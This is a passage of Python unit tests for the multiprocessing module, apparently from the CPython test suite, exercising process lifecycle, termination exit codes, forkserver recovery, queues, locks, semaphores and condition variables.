current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=5)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
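        # Start a sleeping child, check that join() with a zero or negative
        # timeout returns immediately, then stop the child with `meth`
        # (terminate or kill) and return its exit code.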
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
            # Install the broken stream: a closed StringIO for 'close', or
            # None for 'remove'.
            setattr(sys, stream_name, stream)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
            # Only the forkserver start method has a forkserver process to
            # kill, so skip for fork/spawn.
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
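# A Process subclass that upper-cases strings received over a Pipe; used to
# exercise subclassing of multiprocessing.Process.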
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
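# Some queue flavours may not provide empty()/full(); fall back to qsize()
# so the same assertions work for every queue type under test.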
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
        # the values may be in the buffer but not yet in the pipe, so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
        # process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
                # qsize is not available on all platforms as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
        # Currently fails on macOS
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
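    # Child helper: release `sleeping` just before waiting on the condition,
    # then release `woken` once the wait returns (after notify or timeout).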
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
